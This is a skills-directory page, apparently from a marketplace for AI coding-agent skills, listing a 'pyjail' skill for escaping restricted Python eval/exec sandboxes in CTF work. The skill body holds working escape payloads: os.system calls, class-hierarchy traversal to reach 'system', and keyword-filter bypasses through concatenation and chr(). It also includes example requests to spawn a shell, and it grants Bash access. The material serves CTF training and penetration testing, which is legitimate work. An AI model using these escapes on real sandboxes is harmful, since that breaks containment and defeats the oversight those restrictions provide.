Skills Guide

Python Sandbox Escape

VerifiedCaution

Provides techniques to escape restricted Python eval/exec environments, including basic command execution, class hierarchy traversal, and keyword bypasses using encoding or concatenation. Useful for penetration testing and CTF challenges involving Python jails or sandbox restrictions.

Sby Skills Guide Bot
SecurityIntermediate
806/2/2026
Claude Code
#python#sandbox-escape#security#ctf#jail

Recommended for

Backend developerClaude CodeData scientist

Our review

This skill helps escape Python sandbox restrictions, such as in CTF challenges or filtered eval/exec environments.

Strengths

  • Provides a systematic workflow to identify and bypass keyword/character filters.
  • Offers proven techniques like class hierarchy traversal, encoding, and string concatenation.
  • Includes detailed reference files for advanced bypasses and complete payloads.

Limitations

  • Requires intermediate Python knowledge and understanding of the object model.
  • May fail if the sandbox blocks access to the class hierarchy or builtins.
  • Some modern environments may have patches against these common escapes.
When to use it

Use this skill when facing a Python sandbox that restricts eval/exec or filtered input, and you need to execute arbitrary code.

When not to use it

Avoid this skill if the environment is not Python-based or if you already have unrestricted shell access.

Security analysis

Caution
Quality score90/100

The skill teaches techniques for escaping restricted Python interpreters to run shell commands. While intended for CTF challenges and educational use, these methods could be applied maliciously. No direct malicious payloads or destructive instructions are present, but the allowed Bash tool combined with these escape methods could lead to system compromise if abused.

Findings
  • Provides methods to bypass Python sandbox restrictions and execute arbitrary OS commands, which could be misused in unauthorized environments.

Examples

Basic OS command execution
I'm in a Python jail that blocks the word 'os'. How can I execute a system command to read flag.txt?
Bypass filter with class hierarchy
The sandbox blocks __import__ and builtins. Use class hierarchy to get a file read capability.
Find useful subclass index
Help me find the index of a callable subclass in Python's object hierarchy so I can spawn a shell.

name: pyjail description: Escapes Python sandbox restrictions. Use when working with restricted Python eval/exec environments, sandbox escapes, filtered input challenges, or Python jail challenges. allowed-tools: Bash, Read, Write, Grep, Glob

Python Jail Escape Skill

Quick Workflow

Progress:
- [ ] Identify restrictions (blocked keywords/chars)
- [ ] Try basic escapes first
- [ ] If builtins blocked, use class hierarchy
- [ ] Bypass filters with encoding/concatenation
- [ ] Execute command to get flag

Quick Reference - Common Escapes

# Basic command execution
__import__('os').system('cat flag.txt')
eval("__import__('os').system('id')")
exec("import os; os.system('ls')")

# Using breakpoint (Python 3.7+)
breakpoint()  # Drops into pdb, then !cat flag.txt

# No builtins - class hierarchy
().__class__.__base__.__subclasses__()[132].__init__.__globals__['system']('cat flag')

# Keyword bypass
__import__('o'+'s').system('cat flag')
__import__(chr(111)+chr(115)).system('cat flag')

Reference Files

| Topic | Reference | |-------|-----------| | Bypass Techniques | reference/bypass.md | | Complete Payloads | reference/payloads.md |

Quick Debugging

# Find useful class index
for i, c in enumerate(().__class__.__base__.__subclasses__()):
    if 'wrap' in str(c): print(i, c)

# Check available builtins
dir(__builtins__)
Related skills

Security Audit Scanner

Premium

Security

Analyzes code to detect OWASP Top 10 vulnerabilities.

Claude Codeadvanced
210
87
906
Admin

OWASP Security Checklist

Security

Generates application security checklists based on the OWASP Top 10.

claudeCursorWindsurfintermediate
148
41
440
Admin

Threat Model Generator

Security

Generates threat model documents with STRIDE analysis.

claudeCursoradvanced
78
23
289
Admin